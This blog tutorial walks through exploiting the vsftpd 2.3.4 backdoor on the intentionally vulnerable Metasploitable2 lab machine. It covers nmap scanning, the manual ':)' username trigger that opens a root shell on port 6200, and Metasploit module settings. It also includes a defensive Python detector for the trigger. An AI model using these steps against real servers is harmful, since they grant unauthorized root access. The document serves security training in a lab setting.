Metasploitable 2 Series – VSFTPD

This is the first of many blog posts in which we will explore different techniques for exploiting the Metasploitable2 machine. In this post, I will focus on the FTP service, which is provided by the VSFTPD application.


Metasploitable2

The Metasploitable virtual machine created by Rapid7 is an intentionally vulnerable version of Ubuntu Linux designed for demonstrating common security vulnerabilities. This is the second version of Metasploitable and includes even more vulnerabilities than the original image. The virtual machine is compatible with VMware, VirtualBox and other common virtual machine platforms. By default, Metasploitable's network interfaces are bound to the NAT and Host-Only network adapters. A video tutorial on installing Metasploitable in VirtualBox is available on the Rapid7 website.


Download Metasploitable2

https://sourceforge.net/projects/metasploitable/files/Metasploitable2/


Getting Started

After installing the virtual machine, go ahead and power it up. Once it has booted, log in to the console with the username msfadmin and the password msfadmin. Use the ifconfig command to verify the IP address of the machine.

ifconfig.png

In our case, the IP address of the Metasploitable virtual machine is 10.0.19.235. The machine we will be using for attacking purposes runs Kali Linux and has the IP address 10.0.18.250.


Services

From our attacking machine, we identify the open ports on the virtual machine using a small tool called nmap. The following command scans all 65535 TCP ports on our vulnerable virtual machine.

root@SPaWn:~# nmap -p1-65535 10.0.19.235

metasploitable nmap scan.png

You can see lots of open ports in the above screenshot, but we will only focus on FTP port 21 for now.


VSFTPD

We have made no secret of which application is running behind port 21 (VSFTPD), but in a real penetration test we would not know in advance which service sits behind which port, so we will proceed as if we did not.

Let's run a more in-depth scan against port 21 using nmap.

vsftpd nmap scan.png

Nmap can also be used as a vulnerability scanner by leveraging the many scripts bundled with it. This "Scripting Engine" feature is what makes nmap such a powerful tool during penetration testing assignments.

vsftpd backdoor.png

Our scan clearly indicates that this version of vsFTPd contains a backdoor and can be exploited to gain a root shell. After going through the reference pages from our last nmap scan, we found that if a username ending with a ":)" smiley face is sent, the backdoored version of vsFTPd opens a listening shell on port 6200.
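From the defender's side, the same two facts (the ":)" trigger in the USER command and the follow-on connection to port 6200) are what you would look for in captured FTP control-channel traffic. The following detector is an added example, not code from the original post; the session-log format and the sample session are constructed assumptions, and the source and target addresses are the ones used in this post.

```python
import re

TRIGGER = ":)"          # the two bytes the backdoored vsFTPd 2.3.4 looks for in USER
BACKDOOR_PORT = 6200    # the port the backdoor's listening shell binds to

# Constructed session-log format (an assumption, not a real tool's output):
#   "<src_ip> C <ftp command sent by client>"   for control-channel commands
#   "<src_ip> CONNECT <dst_ip>:<dst_port>"      for follow-on TCP connections
SAMPLE_LOG = """\
10.0.18.250 C USER anonymous
10.0.18.250 C PASS guest@
10.0.18.250 C QUIT
10.0.18.250 C USER letmein:)
10.0.18.250 C PASS hahaha
10.0.18.250 CONNECT 10.0.19.235:6200
"""

USER_RE = re.compile(r"^(?P<src>\S+) C USER (?P<name>.*)$")
CONNECT_RE = re.compile(r"^(?P<src>\S+) CONNECT (?P<dst>\S+):(?P<port>\d+)$")


def find_backdoor_triggers(log_text):
    """Return (src_ip, username) for every USER command carrying ':)'."""
    # The post shows ':)' at the end of the username; checking for the
    # sequence anywhere in the argument covers that case too.
    hits = []
    for line in log_text.splitlines():
        m = USER_RE.match(line)
        if m and TRIGGER in m.group("name"):
            hits.append((m.group("src"), m.group("name")))
    return hits


def find_backdoor_connections(log_text):
    """Return (src_ip, dst_ip) for every connection record to port 6200."""
    hits = []
    for line in log_text.splitlines():
        m = CONNECT_RE.match(line)
        if m and int(m.group("port")) == BACKDOOR_PORT:
            hits.append((m.group("src"), m.group("dst")))
    return hits


def assess(log_text):
    """Classify a session: 'trigger+shell', 'trigger', or 'clean'."""
    if not find_backdoor_triggers(log_text):
        return "clean"
    return "trigger+shell" if find_backdoor_connections(log_text) else "trigger"
```

A trigger without a matching port-6200 connection is still worth an alert: it shows someone probing for the backdoor even if the shell was never used.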



Method-1: Manual

Let’s first check the status of port 6200 on our vulnerable virtual machine using netcat.

port 6200 connection refused.png

A "Connection refused" message signals that the port on the target machine is closed. Now connect to the FTP service and provide the username letmein:) and the password hahaha.

ftpconnect.png

Let’s check the status of port 6200 now.

port 6200 now open.png

Our vulnerable machine is now listening on port 6200, and connecting to this port gives us a root shell.

method 1 shell.png



Method-2: Metasploit

To exploit this vulnerability using the Metasploit framework, type the command "msfconsole" at your Kali Linux command prompt. Once Metasploit is launched, search for "VSFTPD". Your search will probably return only one hit; select that exploit with the following command.

msf > use exploit/unix/ftp/vsftpd_234_backdoor

After selecting your exploit, set the values to make the exploit work, such as the following:

set RHOST W.X.Y.Z

set PAYLOAD cmd/unix/interact

set LHOST A.B.C.D

set LPORT 12345

where W.X.Y.Z and A.B.C.D are the IP addresses of our target and attacking machines respectively. After setting the values for the VSFTPD backdoor exploit, we can use either the command "run" or "exploit" to fire the exploit against the target machine. Successful exploitation gives us a root shell.

vsftpd exploit-metasploit.png



Method-3: Exploit code

You can also write exploit code for this vulnerability in any language of your choice. Since we are already familiar with how this vulnerability affects the product, we are using exploit code written in our favorite language, Python. This exploit requires two parameters: 1. the IP address of the target machine and 2. the port number. After firing the exploit, we get a root shell.

vsftpd-exploit-code.png

EOF.
